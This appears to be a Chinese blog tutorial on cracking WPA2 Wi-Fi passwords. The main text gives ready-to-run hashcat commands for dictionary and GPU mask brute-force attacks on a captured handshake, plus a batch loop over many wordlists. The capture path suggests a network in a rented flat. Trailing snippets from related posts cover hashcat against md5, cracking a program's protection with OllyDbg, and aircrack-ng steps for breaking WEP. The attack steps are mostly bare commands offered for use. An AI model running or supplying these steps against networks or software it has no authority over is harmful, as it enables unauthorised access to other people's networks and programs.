用 hashcat 破解 WIFI WPA2破解

2022-06-27 09:27:12 字數 1549 閱讀 4052

首先用cdlinux系統進行抓包,cdlinux抓包我就不詳細說明

到這裡可以檢視如何安裝cdlinux 

到這裡可以檢視如何使用cdlinux 

進入正題:

hashcat是用來破解wpa2的包,當然也可以破解很多東西(如系統密碼、rar、md5等等,它比較受歡迎) 

windows 和linux 都可以,破解速度還可以,主要還用到gpu顯示卡並行模式,破解速度相當快

[引數使用]

思路:1、先用弱口令字典破解

2、弱口令破解不了,就開始用gpu顯示卡進行8-12位數字破解

3、上面破解不了,就開始用gpu顯示卡進行8-12位數字字母特殊字元組合破解

開始:

我用64位系統就用hashcat64.exe,格式如下:

下面的意思:用了7個字典破解34-96-72-0a-0c-da_handshake.cap.hccap包

hashcat64.exe -m 2500 g:\wifi\pcap\ziroom301\34-96-72-0a-0c-da_handshake.cap.hccap g:\wifi\dic\ok\1.dict g:\wifi\dic\ok\2.dict  g:\wifi\dic\ok\3.dict g:\wifi\dic\ok\5.dict g:\wifi\dic\ok\6.dict g:\wifi\dic\ok\7.dict
下面的意思:用gpu且8位數字掩碼來破解34-96-72-0a-0c-da_handshake.cap.hccap包

hashcat64.exe -a 3 -m 2500 g:\wifi\pcap\ziroom301\34-96-72-0a-0c-da_handshake.cap.hccap ?d?d?d?d?d?d?d?d
下面的意思:用gpu且9位大小寫字母特殊字元組合的掩碼來破解34-96-72-0a-0c-da_handshake.cap.hccap包

hashcat64.exe -a 3 -m 2500 g:\wifi\pcap\ziroom301\34-96-72-0a-0c-da_handshake.cap.hccap --custom-charset1=?a ?1?1?1?1?1?1?1?1?1
cracking wpa/wpa2 with oclhashcat:

git:

小技巧:可以在hashcat的目錄下建乙個bat命令批量執行多個wpa-1-34.txt dict 字典目錄如下:

for /l %x in (1, 1, 34) do echo hashcat64.exe -m 2500 -a 0 e:\a\wifi\netcore\netcore.hccapx e:\a\wifi\dict\wpa\wpa-%x.txt
正在跑:檢視進度可輸入 s

原文:

HASH暴力破解工具 Hashcat

烏雲網看到一篇文章講述hashcat的使用簡介 戳這裡 對使用字典破解md5內容 簡單在kali上嘗試了一下。1 首先檢視了下hashcat的幫助文件,簡單擷取了其中的部分常用說明。hashcat,advanced password recovery usage hashcat options ha...

用OllyDbg做破解

朋友所託,要幫忙破解乙個mfc的小程式,他急等著用 背景 幾個人合夥創業,其中乙個負責寫這個有點小核心的專案,為了鞏固自己的 地位 搞的小把戲,給加了密,要用必須通過他 我艹 雖說自己搞c 比較多,相對來講native一點,但是對於彙編與破解,了解相當有限,去年這朋友也找過我,因為當時剛換公司比較忙...

用ubuntu破解wep加密的wifi

1 sudo apt get install aircrack ng 2 開啟終端1,sudo airmon ng start wlan0 sudo airodump ng mon0 記住型別為web的裝置的mac位址 3 開啟終端2 sudo airodump ng c 頻道 bssid 目標主機...